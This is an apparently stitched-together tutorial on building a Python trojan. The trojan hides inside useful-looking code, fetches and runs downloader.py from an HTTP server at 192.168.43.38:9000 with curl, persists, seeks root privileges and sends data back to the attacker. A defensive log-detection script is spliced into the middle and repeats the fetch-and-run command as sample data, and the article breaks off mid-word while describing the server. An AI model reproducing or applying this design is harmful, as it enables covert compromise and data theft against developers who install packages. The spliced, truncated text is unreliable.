Python trojan design: an HTTP-based Python trojan for remote system forensics and privilege transfer

Python trojan design

Overview

In this article, we will be building a Python-based trojan that does the following:

  1. Download code unrelated to the trojan from a remote server and run it
  2. Update the code downloaded in (1)
  3. Update itself
  4. Rerun itself (immune to any signal except SIGKILL)
  5. Acquire and transfer root privileges (and thus do about anything on the target machine)
  6. Send data over HTTP to the attacker

And we begin with a simple assumption: the target executes some code that is beneficial to it. It might be anything, like a Python package that does some task the user thinks is worth doing.

Source code: Github


Introduction

Trojans are powerful because they look benign and are among the foremost candidates for evading suspicion. Once run, they go about their malicious intent while looking perfectly fine to the target. More so since targets (especially developers) are usually not suspicious of grabbing open-source code/packages and running them. It might be a good entry point for our exploit.

The 'good' code

The good code is simple. It does what the target intends it to do. It might range across a variety of things and span a whole package; the bigger the codebase, the harder it is to spot the extra activity. We'll skip that part and write a simple script that prints something.

The good code with somewhat bad intents.

To the target, this script should do what it is meant to (printing a simple line, in our case) and exit peacefully. Apart from that, the main business here is the other stuff. The script creates a directory `downloaded` (in the normal case you would want the working directory to be somewhere hidden; I'll skip that for conciseness and because it is obvious how to do so), switches to it, and makes a cURL request (read more about cURL here) to a server at http://192.168.43.38:9000/downloader.py, saving the content returned as a Python script downloader.py. It then fires the command python3 downloader.py and peacefully exits. Since Popen was used, the child process (running downloader.py) is disassociated from the parent (good.py) on the parent's exit and reparented to init. So effectively, it becomes a separate process. The function run_command() is the Python equivalent of a shell: it runs the specified command and returns the output from STDOUT, i.e. what you would have received had you used a shell.
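From the defender's side, the chain just described (a cURL fetch of a .py file followed by an interpreter executing it, the child reparented to init once the parent exits) is exactly what an endpoint detection would look for. The following is an added example, not code from the article, that runs that check over constructed process-exec records in a hypothetical key=value collector format; the record layout, the sample events and the function names are assumptions made for the illustration.

```python
import os
import re
import shlex

# Constructed sample of exec records in a hypothetical key=value collector
# format (not output of the article's code): pid, parent pid, cwd, command.
SAMPLE_EVENTS = """\
pid=4100 ppid=3990 cwd=/home/dev/project cmd=python3 good.py
pid=4101 ppid=4100 cwd=/home/dev/project/downloaded cmd=curl http://192.168.43.38:9000/downloader.py -o downloader.py
pid=4102 ppid=1 cwd=/home/dev/project/downloaded cmd=python3 downloader.py
pid=4103 ppid=3990 cwd=/home/dev/project cmd=curl https://example.invalid/data.json -o data.json
"""

EVENT_RE = re.compile(r"pid=(\d+) ppid=(\d+) cwd=(\S+) cmd=(.*)")
INTERPRETERS = {"python", "python3"}

def parse_events(text):
    """Parse key=value exec records into dicts; malformed lines are skipped."""
    return [{"pid": int(m[1]), "ppid": int(m[2]), "cwd": m[3],
             "argv": shlex.split(m[4])}
            for m in map(EVENT_RE.match, text.splitlines()) if m]

def fetched_output(ev):
    """Absolute path a curl invocation writes with -o FILE, or None."""
    argv = ev["argv"]
    if argv and os.path.basename(argv[0]) == "curl" and "-o" in argv[:-1]:
        return os.path.join(ev["cwd"], argv[argv.index("-o") + 1])
    return None

def executed_script(ev):
    """Absolute path of the .py file a python process runs, or None."""
    argv = ev["argv"]
    if len(argv) < 2 or os.path.basename(argv[0]) not in INTERPRETERS:
        return None
    first = argv[1]  # -m/-c mean no script file; other option orders not handled
    return os.path.join(ev["cwd"], first) if first.endswith(".py") else None

def find_fetch_and_exec(text):
    """Flag interpreter execs of a .py file that curl wrote earlier in the log."""
    events = parse_events(text)
    fetched = {p for p in map(fetched_output, events) if p and p.endswith(".py")}
    findings = []
    for ev in events:
        script = executed_script(ev)
        if script in fetched:
            reason = "runs script fetched over HTTP"
            if ev["ppid"] == 1:
                reason += "; reparented to init (parent exited)"
            findings.append((ev["pid"], script, reason))
    return findings
```

On the sample records only pid 4102 is flagged: it runs the file the earlier curl wrote, and its parent is already PID 1, matching the Popen hand-off the paragraph describes.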

Now it is time to set up the server at http://192.168.43.38:9000.

Server end

The idea is to build a server that automatically pushes code to the remote end. It will later be used to update code in real time, transfer files, send commands, and a lot more. All we need to do is configure an HTTP server capable of handling POST and GET.

basic HTTP server skeleton in setup_server.py

An HTTPServer in Python runs on two pieces of information: where to put it up and what to do on interaction. The former is handled by ('192.168.43.38', 9000), which binds the server to port 9000 of the machine; 192.168.43.38 is the local IP. The latter is handled by a separate class extending BaseHTTPRequestHandler that defines the functionality for POST and GET. The _set_response() function sends the mandatory HTTP header information (the status code 200 representing success, the headers, and the end-of-headers marker). Since we shall be dealing with text data, setting the Content-type to text/html is fine. Now to add the two main functions.

GE